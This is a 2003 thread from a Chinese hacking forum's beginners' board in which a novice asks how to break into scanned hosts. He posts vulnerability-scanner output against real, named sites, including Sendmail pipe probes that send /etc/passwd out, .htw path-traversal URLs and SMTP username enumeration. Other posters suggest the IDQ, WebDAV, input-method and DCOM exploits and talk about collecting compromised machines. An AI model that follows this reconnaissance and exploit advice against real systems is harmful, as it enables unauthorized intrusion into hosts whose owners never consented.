论坛: 菜鸟乐园 标题: 3389问题! 复制本贴地址    
作者: mingming8 [mingming8]    论坛用户   登录
我扫到一台开3389的主机,日本的!
如我的是XP要在运行里输入cmp 然后在用 K 1 Ip与他相连
但我的机器是98,要怎么办呢???

地主 发表时间: 08/15 12:35

回复: all528 [all528]   论坛用户   登录
有专门的终端连接器 WIN系统都可以使用

B1层 发表时间: 08/15 15:18

回复: tommy_he [tommy_he]   版主   登录
3389是正常的合法的登陆端口,也需要密码和用户的!
只是打开了是没有用的!你必须有合法的用户和密码才可以进去的!
2K的都有自己的这个程序,一般都是用专门的登陆程序登的才可以!

B2层 发表时间: 08/15 15:31

回复: mingming8 [mingming8]   论坛用户   登录
是什么名字啊,我又找到一台135和3389同时开放的!

B3层 发表时间: 08/15 15:32

回复: mingming8 [mingming8]   论坛用户   登录
哦,那要什么程序呢?
有没有哪个是不需要密码的啊!
看我的标题,我应该再哪里输入呢?

B4层 发表时间: 08/15 15:36

回复: tommy_he [tommy_he]   版主   登录
你可以通过3389进入他的输入界面,但是他要提示你输入密码和用户,这个时候你是没有办法的了!因为没有这个你没有办法的!

没有锁的门你见过吗!?所以没有什么不要密码的,除非哪个白痴傻到无敌的地步了!

B5层 发表时间: 08/15 16:00

回复: mingming8 [mingming8]   论坛用户   登录
无心好有趣啊!
帮我想想办法,怎么才能进去呢?我连一个肉鸡都没有!
有什么软件能破解密码吗?

B6层 发表时间: 08/15 16:08

回复: mingming8 [mingming8]   论坛用户   登录
在问一下,如果有权限了,还有把客户端拷贝上去。
但要考哪一个啊,是那个终端服务客户端吗?

B7层 发表时间: 08/15 16:10

回复: tommy_he [tommy_he]   版主   登录
当然是服务端了,为别人打开服务的啥!可户是使用的哈!
这个和一般的复制粘贴不同哈!

B8层 发表时间: 08/15 16:14

回复: mingming8 [mingming8]   论坛用户   登录
上传,或copy上去可以么?
有权限时・

B9层 发表时间: 08/15 16:30

回复: tommy_he [tommy_he]   版主   登录
可以上传,不可以COPY!
你用自己的内存复制,能调到别人的内存粘贴吗?
有权限也不是这个问题!

B10层 发表时间: 08/15 16:38

回复: mingming8 [mingming8]   论坛用户   登录
NT弱口令帐户:0 开放端口:25,53,110,135,3389 

我可否入侵!
要怎样入侵???谢!

B11层 发表时间: 08/15 16:43

回复: mingming8 [mingming8]   论坛用户   登录
扫描目标主机开放的端口:

7号端口(未知)开放!

9号端口(未知)开放!

13号端口(未知)开放!

17号端口(未知)开放!

19号端口(未知)开放!

25号端口(未知)开放!

53号端口(未知)开放!

110号端口(未知)开放!

135号端口(未知)开放!

515号端口(未知)开放!

1025号端口(未知)开放!

3389号端口(未知)开放!

开始扫描FTP漏洞:

目标没有开放FTP服务...


开始扫描SMTP漏洞:

SMTP服务器的Banner:
220 ATM SERVER MAIL ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.2.5)

214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.2.5)
214-Following commands are supported:
214-HELO   EHLO   MAIL   RCPT
214-DATA   RSET   NOOP   AUTH-LOGIN
214-EXPN   QUIT
214-To report bug, send mail to support@argosoft.com
214 End of HELP

可以使用RCPT命令获得用户名列表.

可以使用EXPN命令获得用户名列表.



尝试利用RCPT命令获得目标机上存在的一些常见用户名:
root
test
www
web
sybase
oracle
informix
guest
sam_exec
+
oracle8
access
user
ftp
account
backup
owc
datebase
public
info
wais
news
bbs
adm
sync
john
sports
china

检查decode别名:




检查漏洞


检查debug漏洞


检查kill漏洞


检查wiz漏洞


检查rcpt to: /tmp/.rhosts漏洞


检查+ +漏洞


检查RSET漏洞


检查mail from: |/bin/mail hacker < /etc/passwd漏洞


检查RSET漏洞


检查mail from: |tail|sh漏洞


开始扫描FINGER漏洞:

目标没有开放FINGER服务...


开始扫描CGI漏洞:

目标没有开放WWW服务...


开始扫描IIS漏洞:

目标没有开放WWW服务...

开始扫描RPC漏洞:

目标没有开放RPC查询服务...
   这些说明什么啊!

B12层 发表时间: 08/15 16:48

回复: mingming8 [mingming8]   论坛用户   登录
扫描目标主机开放的端口:

80号端口(未知)开放!

135号端口(未知)开放!

1025号端口(未知)开放!

开始扫描FTP漏洞:

目标没有开放FTP服务...


开始扫描SMTP漏洞:

目标没有开放SMTP服务...


开始扫描FINGER漏洞:

目标没有开放FINGER服务...


开始扫描CGI漏洞:

WWW服务器的Banner:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Aug 2003 09:10:23 GMT
Connection: Keep-Alive
Content-Length: 87395
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACRDAASC=NLBOEPDCALOLFLIHEMPAABIG; path=/
Cache-control: private


开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...

发现/iishelp/iis/misc/iirturnh.htw漏洞

发现/iissamples/exair/search/qsumrhit.htw漏洞

发现/iissamples/issamples/oop/qfullhit.htw漏洞

发现/iissamples/issamples/oop/qsumrhit.htw漏洞


开始扫描IIS漏洞:

WWW服务器的Banner:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Aug 2003 09:12:31 GMT
Connection: Keep-Alive
Content-Length: 87395
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACRDAASC=EOBOEPDCGCEGDMKLNDMLFEPL; path=/
Cache-control: private


开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...

开始扫描RPC漏洞:

目标没有开放RPC查询服务...
    

B13层 发表时间: 08/15 17:24

回复: mingming8 [mingming8]   论坛用户   登录
这是一个电影网站的扫描结果!和上贴是同一个网!
详细资料




【端口信息】:


端口80开放 
[Banner] 
HTTP/1.1 200 OK 
Server: Microsoft-IIS/5.0 
Date: Fri, 15 Aug 2003 09:12:35 GMT 
Connection: Keep-Alive 
Content-Length: 87395 
Content-Type: text/html 
Set-Cookie: ASPSESSIONIDACRDAASC=FOBOEPDCPDGAPJKOABENGOIH; path=/ 
Cache-control: private 

[End of banner] 
端口135开放 
[Banner] 
[None] 
[End of banner] 

端口--服务对照表 

【RPC检测结果】:


Error: Can't contact portmapper. 

【SQL-SERVER默认帐户检测结果】:



【FTP弱口令检测结果】:



【NT弱口令用户】:



【CGI检测结果】:


/default.asp 
/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 
/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full 
/?wp-cs-dump 
/?wp-html-rend 
/?wp-start-ver 
/?wp-stop-ver 
/?wp-uncheckout 
/?wp-usr-prop 
/?wp-ver-diff 
/?wp-verify-link 
/?wp-ver-info 

【IIS检测结果】:


IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞: /null.ida 
IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞: /null.idq 

IIS 5.0 .printer远程缓冲区溢出漏洞 

扫描项目全部完成. 





B14层 发表时间: 08/15 17:37

回复: mingming8 [mingming8]   论坛用户   登录
对令一个网站的扫描!扫描目标主机开放的端口:

21号端口(未知)开放!

23号端口(未知)开放!

25号端口(未知)开放!

79号端口(未知)开放!

80号端口(未知)开放!

111号端口(未知)开放!

513号端口(未知)开放!

514号端口(未知)开放!

开始扫描FTP漏洞:

FTP服务器的Banner:
220 www.longmovies.com. FTP server (Version 6.00LS) ready.

测试匿名用户

没有匿名用户


开始扫描SMTP漏洞:

SMTP服务器的Banner:
220 longmovies.com ESMTP Sendmail 8.9.3/8.9.3; Fri, 15 Aug 2003 17:52:34 GMT

214-This is Sendmail version 8.9.3
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info

可以使用RCPT命令获得用户名列表.

可以使用VRFY命令获得用户名列表.

可以使用EXPN命令获得用户名列表.

501 HELO requires domain address

250 hacker@hacker.com... Sender ok

尝试利用RCPT命令获得目标机上存在的一些常见用户名:
root
250 root... Recipient ok

test
www
250 www... Recipient ok

web
sybase
oracle
informix
guest
sam_exec
+
oracle8
access
user
ftp
250 ftp... Recipient ok

account
backup
owc
datebase
public
info
wais
news
250 news... Recipient ok

bbs
adm
sync
john
sports
china

检查decode别名:

550 decode... User unknown

500 Command unrecognized: ""


检查漏洞
500 Command unrecognized: ""


检查debug漏洞
500 Command unrecognized: "debug"


检查kill漏洞
500 Command unrecognized: "kill"


检查wiz漏洞
500 Command unrecognized: "wiz"


检查rcpt to: /tmp/.rhosts漏洞
550 /tmp/.rhosts... Cannot mail directly to files


检查+ +漏洞
500 Command unrecognized: "+ +"


检查RSET漏洞
250 Reset state


检查mail from: |/bin/mail hacker < /etc/passwd漏洞
553 |/bin/mail... Invalid sender address


检查RSET漏洞
250 Reset state


检查mail from: |tail|sh漏洞
553 |tail|sh... Invalid sender address


开始扫描FINGER漏洞:

测试SunOS fingerd列出用户名漏洞:
finger: 1234: no such user

测试cfingerd执行任意命令漏洞:

测试某些finger服务器执行任意命令漏洞:

测试dot漏洞:


开始扫描CGI漏洞:

WWW服务器的Banner:
HTTP/1.1 200 OK
Date: Fri, 15 Aug 2003 17:53:41 GMT
Server: Apache/1.3.9 (Unix)
Connection: close
Content-Type: text/html


开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...


开始扫描IIS漏洞:

WWW服务器的Banner:
HTTP/1.1 200 OK
Date: Fri, 15 Aug 2003 17:56:07 GMT
Server: Apache/1.3.9 (Unix)
Connection: close
Content-Type: text/html


开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...

开始扫描RPC漏洞:



B15层 发表时间: 08/15 17:41

回复: woainiwjy [woainiwjy]   论坛用户   登录
不是有输入法漏洞吗~~笨笨~

B16层 发表时间: 08/15 18:50

回复: mingming8 [mingming8]   论坛用户   登录
我不会啊!

B17层 发表时间: 08/15 21:25

回复: woainiwjy [woainiwjy]   论坛用户   登录
看教程啊~~你去GOOGLE收一下就可以了,这个你不能不会吧~~

B18层 发表时间: 08/16 17:33

回复: mingming8 [mingming8]   论坛用户   登录
如果我说不会你会怎么样???

B19层 发表时间: 08/23 13:24

回复: fu414 [fu414]   论坛用户   登录
K,狂K一顿,上面好像有个IDQ溢出的鸡鸡,用IDQ溢出工具试试

B20层 发表时间: 08/28 02:21

回复: game120 [game120]   论坛用户   登录
哎呀 日本的服务器没有3389漏洞的拉 因为别人都不用我们的输入法拉

B21层 发表时间: 08/28 09:35

回复: jamesgj [jamesgj]   论坛用户   登录
现在还有几台机器有什么输入法漏洞哦,好久的事情了哦!有135的话可以利用DCOM的漏洞,如果他没有打补丁的话!呵呵!:)

B22层 发表时间: 08/28 11:52

回复: mingming8 [mingming8]   论坛用户   登录
我是好孩子,已经不搞这些了。
  搞不明白!

B23层 发表时间: 08/29 22:17

回复: guawoo [guawoo]   论坛用户   登录
我倒,有iis漏洞!用webdav溢出仨!
局外话:你真有福,我一台肉鸡都没扫到:(

B24层 发表时间: 08/29 22:40

回复: mingming8 [mingming8]   论坛用户   登录
我说过我学好了,你想要我给你

B25层 发表时间: 08/29 22:52

回复: k_com [k_com]   论坛用户   登录
倒啊~~楼上,给点信心自己啊~~网上的文章多得是啊`~~


B26层 发表时间: 08/30 03:56

回复: naster [naster]   论坛用户   登录
用输入法漏洞肯定办不到(除非没打SP3补丁),然后就是你用什么办法来获取ADMIN权限的问题了,方法有很多,具体我就不说了,嘿嘿~~


B27层 发表时间: 08/30 09:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号